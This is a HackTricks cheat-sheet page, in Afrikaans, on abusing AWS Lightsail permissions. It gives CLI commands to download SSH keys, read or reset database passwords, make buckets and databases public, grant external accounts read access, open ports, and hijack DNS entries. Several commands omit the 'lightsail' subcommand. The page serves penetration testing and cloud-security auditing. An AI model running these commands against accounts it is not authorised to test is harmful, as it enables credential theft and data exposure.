AWS - Lightsail Privesc

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.

Lightsail

Vir meer inligting oor Lightsail, kyk na:

Dit is belangrik om daarop te let dat Lightsail nie IAM-rolle wat aan die gebruiker behoort nie gebruik nie, maar aan 'n AWS-bestuurde rekening, so jy kan nie hierdie diens misbruik om privesc te doen nie. Tog kan sensitiewe data soos kode, API-sleutels en databasisinligting in hierdie diens gevind word.

`lightsail:DownloadDefaultKeyPair`

Hierdie toestemming sal jou in staat stel om die SSH-sleutels te kry om toegang tot die instansies te verkry:

aws lightsail download-default-key-pair

Potensiële Impak: Vind sensitiewe inligting binne die instansies.

`lightsail:GetInstanceAccessDetails`

Hierdie toestemming sal jou in staat stel om SSH-sleutels te genereer om toegang tot die instansies te verkry:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potensiële Impak: Vind sensitiewe inligting binne die instansies.

`lightsail:CreateBucketAccessKey`

Hierdie toestemming sal jou in staat stel om 'n sleutel te verkry om toegang tot die emmer te verkry:

aws lightsail create-bucket-access-key --bucket-name <name>

Potensiële Impak: Vind sensitiewe inligting binne die emmer.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Hierdie toestemming sal jou in staat stel om die geloofsbriewe te verkry om toegang tot die databasis te verkry:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potensiële Impak: Vind sensitiewe inligting binne die databasis.

`lightsail:UpdateRelationalDatabase`

Hierdie toestemming sal jou in staat stel om die wagwoord te verander om toegang tot die databasis te verkry:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

As die databasis nie openbaar is nie, kan jy dit ook openbaar maak met hierdie toestemmings met

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potensiële Impak: Vind sensitiewe inligting binne die databasis.

`lightsail:OpenInstancePublicPorts`

Hierdie toestemming maak dit moontlik om poorte na die internet oop te maak.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Potensiële Impak: Toegang tot sensitiewe poorte.

`lightsail:PutInstancePublicPorts`

Hierdie toestemming maak dit moontlik om poorte na die internet oop te maak. Let daarop dat die oproep enige poort wat nie daarop gespesifiseer is nie, sal sluit.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Potensiële Impak: Toegang tot sensitiewe poorte.

`lightsail:SetResourceAccessForBucket`

Hierdie toestemmings maak dit moontlik om 'n instansie toegang tot 'n emmer te gee sonder enige ekstra geloofsbriewe

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potensiële Impak: Potensiële nuwe toegang tot houers met sensitiewe inligting.

`lightsail:UpdateBucket`

Met hierdie toestemming kan 'n aanvaller sy eie AWS-rekening leestoegang verleen oor houers of selfs die houers openbaar maak vir almal:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potensiële Impak: Potensiële nuwe toegang tot emmers met sensitiewe inligting.

`lightsail:UpdateContainerService`

Met hierdie toestemmings kan 'n aanvaller toegang verleen tot private ECRs vanaf die kontainerdiens.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Potensiële Impak: Kry sensitiewe inligting van private ECR

`lightsail:CreateDomainEntry`

'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres verwys (subdomein-oorgeneem), of 'n SPF-rekord skep wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres instel.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potensiële Impak: Oorname van 'n domein

`lightsail:UpdateDomainEntry`

'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres verwys (subdomein-oorgawe), of 'n SPF-rekord skep wat hom in staat stel om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres instel.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potensiële Impak: Oorname van 'n domein

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 9 months ago